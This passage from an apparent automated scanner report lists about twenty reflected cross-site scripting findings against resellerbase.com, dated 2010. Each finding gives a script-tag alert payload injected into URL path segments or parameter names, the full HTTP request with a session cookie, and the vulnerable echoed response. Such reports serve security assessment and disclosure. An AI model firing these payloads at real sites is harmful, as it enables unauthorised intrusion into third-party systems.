<p>The requested URL /detail/40/themese1b6f<script>alert(1)</script>843cfb38699/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2850. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 882f3<script>alert(1)</script>2b5d0e8b11d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos882f3<script>alert(1)</script>2b5d0e8b11d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos882f3<script>alert(1)</script>2b5d0e8b11d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2851. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d0ef<script>alert(1)</script>7c5d94cf782 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images1d0ef<script>alert(1)</script>7c5d94cf782/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images1d0ef<script>alert(1)</script>7c5d94cf782/rating/ was not found on this server.</p>
...[SNIP]...

2.2852. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a9ee1<script>alert(1)</script>3b69b193bb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/ratinga9ee1<script>alert(1)</script>3b69b193bb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/ratinga9ee1<script>alert(1)</script>3b69b193bb/ was not found on this server.</p>
...[SNIP]...

2.2853. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62225<script>alert(1)</script>68ea59a8f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/?62225<script>alert(1)</script>68ea59a8f32=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/?62225<script>alert(1)</script>68ea59a8f32=1 was not found on this server.</p>
...[SNIP]...

2.2854. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79cf6<script>alert(1)</script>87fb16650c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79cf6<script>alert(1)</script>87fb16650c2/40/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79cf6<script>alert(1)</script>87fb16650c2/40/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2855. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b9b8<script>alert(1)</script>34696fc10e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/409b9b8<script>alert(1)</script>34696fc10e8/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/409b9b8<script>alert(1)</script>34696fc10e8/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2856. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56477<script>alert(1)</script>f3c69bdaa24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes56477<script>alert(1)</script>f3c69bdaa24/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes56477<script>alert(1)</script>f3c69bdaa24/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2857. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc66e<script>alert(1)</script>02e90427b90 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosbc66e<script>alert(1)</script>02e90427b90/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosbc66e<script>alert(1)</script>02e90427b90/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2858. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22005<script>alert(1)</script>8883f7b874d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images22005<script>alert(1)</script>8883f7b874d/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images22005<script>alert(1)</script>8883f7b874d/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2859. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4028c<script>alert(1)</script>740bc540425 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating4028c<script>alert(1)</script>740bc540425/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating4028c<script>alert(1)</script>740bc540425/4half.gif was not found on this server.</p>
...[SNIP]...

2.2860. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c5854<script>alert(1)</script>68942664fce was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/4half.gifc5854<script>alert(1)</script>68942664fce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/4half.gifc5854<script>alert(1)</script>68942664fce was not found on this server.</p>
...[SNIP]...

2.2861. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 629cb<script>alert(1)</script>9ccb02c18bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/4half.gif?629cb<script>alert(1)</script>9ccb02c18bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/4half.gif?629cb<script>alert(1)</script>9ccb02c18bd=1 was not found on this server.</p>
...[SNIP]...

2.2862. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a175<script>alert(1)</script>94027712134 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a175<script>alert(1)</script>94027712134/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a175<script>alert(1)</script>94027712134/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2863. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5933<script>alert(1)</script>9617c076aa4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40e5933<script>alert(1)</script>9617c076aa4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40e5933<script>alert(1)</script>9617c076aa4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2864. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f34d7<script>alert(1)</script>d12116c6ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesf34d7<script>alert(1)</script>d12116c6ad2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesf34d7<script>alert(1)</script>d12116c6ad2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2865. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5ed3<script>alert(1)</script>5a716667d20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmose5ed3<script>alert(1)</script>5a716667d20/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmose5ed3<script>alert(1)</script>5a716667d20/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2866. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7b56a<script>alert(1)</script>102f99ff36c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images7b56a<script>alert(1)</script>102f99ff36c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images7b56a<script>alert(1)</script>102f99ff36c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2867. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 18fd9<script>alert(1)</script>356a74317b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating18fd9<script>alert(1)</script>356a74317b3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating18fd9<script>alert(1)</script>356a74317b3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2868. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 68d48<script>alert(1)</script>8aeae74aaf3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/search.php68d48<script>alert(1)</script>8aeae74aaf3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
